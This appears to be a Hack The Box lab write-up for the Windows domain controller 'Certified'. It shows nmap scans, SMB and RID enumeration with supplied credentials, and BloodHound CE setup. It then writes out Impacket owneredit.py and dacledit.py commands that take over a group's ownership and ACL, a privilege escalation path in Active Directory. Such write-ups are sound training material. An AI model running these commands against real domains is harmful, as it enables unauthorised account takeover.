> For the complete documentation index, see [llms.txt](https://allthewriteups.gitbook.io/book/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://allthewriteups.gitbook.io/book/hack-the-box/release-arena/certified.md). # Certified ## SUMMARY This is a Windows 2019 Server running as a domain controller with several overly permissive misconfigurations, that we enumerate with the new BloodHound CE tool, and a vulnerable AD CS template. First we upgrade our rig: we install the new Bloodhound CE and update our data collector tool so it is compatible with the new BloodHound version. Once all is running, we enumerate the Active Directory and discover overly permissive ACEs that enable a shadow credentials attack on one account. As a result of the attack we obtain an NT hash and gain the user flag. Regarding escalation, we enumerate AD CS templates and find one vulnerable to ESC9. This is abused to generate an administrator certificate and obtain the administrator NT hash. ## KEYWORDS BloodHound CE, BloodHound-CE-Python, Impacket, owneredit.py, dacledit.py, shadow credentials attack, pyWhisker, bloodyAD, Active Directory Certificate Services (AD CS), ESC9. ## REFERENCES ## ENUMERATION Port scan. {% code overflow="wrap" %} ```bash > for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-08 07:44 EST Nmap scan report for 10.10.11.41 Host is up, received user-set (0.078s latency). Scanned at 2025-01-08 07:44:19 EST for 100s PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack Simple DNS Plus 88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-01-08 19:45:04Z) 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- | MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF | ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm | aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa | Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC | ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX | E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8 | wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i | Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6 | 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E | e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C | AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A | dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD | VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G | CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl | AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE | FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L | csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp | ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk | LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh | c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr | BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO | PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy | YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq | ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG | AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw | TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0 | Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC | AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW | VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv | ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE | aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU | fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI | zQY41iYatWCKZW54Ylno2wj9tg== |_-----END CERTIFICATE----- 445/tcp open microsoft-ds? syn-ack 464/tcp open kpasswd5? syn-ack 593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- | MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF | ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm | aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa | Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC | ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX | E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8 | wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i | Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6 | 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E | e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C | AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A | dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD | VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G | CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl | AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE | FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L | csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp | ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk | LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh | c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr | BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO | PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy | YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq | ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG | AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw | TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0 | Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC | AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW | VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv | ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE | aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU | fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI | zQY41iYatWCKZW54Ylno2wj9tg== |_-----END CERTIFICATE----- |_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time. 3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- | MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF | ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm | aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa | Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC | ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX | E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8 | wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i | Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6 | 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E | e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C | AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A | dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD | VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G | CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl | AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE | FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L | csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp | ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk | LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh | c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr | BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO | PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy | YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq | ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG | AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw | TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0 | Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC | AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW | VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv | ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE | aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU | fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI | zQY41iYatWCKZW54Ylno2wj9tg== |_-----END CERTIFICATE----- |_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time. 3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- | MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF | ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm | aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa | Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC | ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX | E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8 | wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i | Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6 | 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E | e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C | AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A | dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD | VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G | CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl | AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE | FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L | csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp | ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk | LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh | c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr | BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO | PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy | YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq | ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG | AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw | TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0 | Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC | AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW | VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv | ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE | aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU | fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI | zQY41iYatWCKZW54Ylno2wj9tg== |_-----END CERTIFICATE----- |_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time. 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack .NET Message Framing 49666/tcp open msrpc syn-ack Microsoft Windows RPC 49668/tcp open msrpc syn-ack Microsoft Windows RPC 49673/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc syn-ack Microsoft Windows RPC 49683/tcp open msrpc syn-ack Microsoft Windows RPC 49716/tcp open msrpc syn-ack Microsoft Windows RPC 49740/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 50458/tcp): CLEAN (Timeout) | Check 2 (port 47719/tcp): CLEAN (Timeout) | Check 3 (port 13824/udp): CLEAN (Timeout) | Check 4 (port 12583/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_clock-skew: mean: 7h00m42s, deviation: 0s, median: 7h00m42s | smb2-security-mode: | 311: |_ Message signing enabled and required | smb2-time: | date: 2025-01-08T19:46:01 |_ start_date: N/A Nmap done: 1 IP address (1 host up) scanned in 100.85 seconds List of open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49668,49673,49674,49683,49716,49740 ``` {% endcode %} We have also credentials for `judith.mader:judith09`. We can use them to enumerate the SMB service. ```bash > smbmap -H certified.htb -P 445 -u judith.mader -p judith09 [+] IP: certified.htb:445 Name: unknown Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share ``` And bruteforce the RID to get a list of usernames. ```bash > crackmapexec smb certified.htb -u judith.mader -p judith09 --rid-brute SMB 10.10.11.41 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09 SMB 10.10.11.41 445 DC01 [+] Brute forcing RIDs SMB 10.10.11.41 445 DC01 498: CERTIFIED\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 500: CERTIFIED\Administrator (SidTypeUser) SMB 10.10.11.41 445 DC01 501: CERTIFIED\Guest (SidTypeUser) SMB 10.10.11.41 445 DC01 502: CERTIFIED\krbtgt (SidTypeUser) SMB 10.10.11.41 445 DC01 512: CERTIFIED\Domain Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 513: CERTIFIED\Domain Users (SidTypeGroup) SMB 10.10.11.41 445 DC01 514: CERTIFIED\Domain Guests (SidTypeGroup) SMB 10.10.11.41 445 DC01 515: CERTIFIED\Domain Computers (SidTypeGroup) SMB 10.10.11.41 445 DC01 516: CERTIFIED\Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 517: CERTIFIED\Cert Publishers (SidTypeAlias) SMB 10.10.11.41 445 DC01 518: CERTIFIED\Schema Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 519: CERTIFIED\Enterprise Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 520: CERTIFIED\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.41 445 DC01 521: CERTIFIED\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 522: CERTIFIED\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 525: CERTIFIED\Protected Users (SidTypeGroup) SMB 10.10.11.41 445 DC01 526: CERTIFIED\Key Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 527: CERTIFIED\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 553: CERTIFIED\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.41 445 DC01 571: CERTIFIED\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.41 445 DC01 572: CERTIFIED\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.41 445 DC01 1000: CERTIFIED\DC01$ (SidTypeUser) SMB 10.10.11.41 445 DC01 1101: CERTIFIED\DnsAdmins (SidTypeAlias) SMB 10.10.11.41 445 DC01 1102: CERTIFIED\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.41 445 DC01 1103: CERTIFIED\judith.mader (SidTypeUser) SMB 10.10.11.41 445 DC01 1104: CERTIFIED\Management (SidTypeGroup) SMB 10.10.11.41 445 DC01 1105: CERTIFIED\management_svc (SidTypeUser) SMB 10.10.11.41 445 DC01 1106: CERTIFIED\ca_operator (SidTypeUser) SMB 10.10.11.41 445 DC01 1601: CERTIFIED\alexander.huges (SidTypeUser) SMB 10.10.11.41 445 DC01 1602: CERTIFIED\harry.wilson (SidTypeUser) SMB 10.10.11.41 445 DC01 1603: CERTIFIED\gregory.cameron (SidTypeUser) ``` This looks like an excellent opportunity to test[ BloodHound CE](https://github.com/SpecterOps/BloodHound), the new version of the legendary graphical Active Directory enumeration tool Bloodhound. It seems the original release is now called BloodHound Legacy, and there is another BloodHound Enterprise version. Let's follow [instructions to install BloodHound CE](https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose). The process can be done with Docker Compose, and looks simplified with regards how was done in the classic release. Download the composer file and run it. ```bash > curl -L https://ghst.ly/getbhce > .\docker-compose.yml > docker compose up ```
When finished, access BHCE GUI via . Username is `admin`, and the password is provided in the Docker Compose output. Take note of it as it needs to be reset during first login. Once inside the tool, we are presented an empty database.
We need a collector to gather data to ingest. We do not have a shell in the host so we cannot use `SharpHound.exe`. We will have to collect the data remotely with `BloodHound.py`. However, it seems [collectors for BloodHound Legacy do not work anymore with BHCE](https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf), so we will have to update our toolbox. In the [BloodHound.py GitHub repository](https://github.com/dirkjanm/BloodHound.py) we see there is a new package called `bloodhound-ce` specifically designed for BHCE. Install with `pip` ```bash > pip install bloodhound-ce ``` The binary is installed in `/home/kali/.local/bin/bloodhound-ce-python` and is designed to run under Python3. {% code overflow="wrap" %} ```bash > python3 /home/kali/.local/bin/bloodhound-ce-python -u judith.mader -p 'judith09' -c All -d certified.htb -ns 10.10.11.41 ``` {% endcode %}
Just take the JSON files and ingest the data in BHCE. Click on *Settings → Administration → Upload Files*.
Now we can start exploring the domain. The built-in queries are available in *Explore → Cypher → Open*. For example, let's list all domain admins.
To enumerate `judith.mader`, click on "Search" and type the username, the user icon is displayed. Then click on "Outbound Object Control" to list which objects the user `judith.mader` can control or manipulate.
We see she has *WriteOwner* rights over the `management@certified.htb` group, meaning she has permissions to change the owner of this group. ## USER By clicking on the *WriteOwner* edge, the application itself suggests an exploitation path.
Basically, the abuse path is: 1. Leverage the *WriteOwner* right to set `judith.mader` as the group owner. 2. Grant `judith.mader` permission to add any user to the group. 3. Add `judith.mader` to the group. Let's start by enumerating the `management@certified.htb` group with `ldapsearch` {% code overflow="wrap" %} ```bash > ldapsearch -x -D "cn=judith mader,cn=users,dc=certified,dc=htb" -w judith09 -H ldap://certified.htb -b " cn=management,cn=users,dc=certified,dc=htb " ``` {% endcode %}
Next, change the group owner with Impacket's `owneredit.py`. Version 0.12 is needed for this, so you may need to upgrade your packages. ```bash > sudo apt update && sudo apt install -y --only-upgrade python3-impacket ``` `owneredit.py` allows to work with either `sAMAccountName` or `distinguishedName` to identify the target and new owner accounts. We can take any of these from BHCE. {% code overflow="wrap" %} ```bash > python3 /usr/share/doc/python3-impacket/examples/owneredit.py -action write -new-owner judith.mader -target Management 'certified.htb/judith.mader:judith09' ``` {% endcode %}
Next step would be to edit the group DACL adding a new ACE that grants `judith.mader` permission to add new members. It is done with Impacket's `dacledit.py` {% code overflow="wrap" %} ```bash > python3 /usr/share/doc/python3-impacket/examples/dacledit.py -action 'write' -rights 'WriteMembers' -target-dn "CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB" -principal "judith.mader" "certified.htb/judith.mader:judith09" ``` {% endcode %}
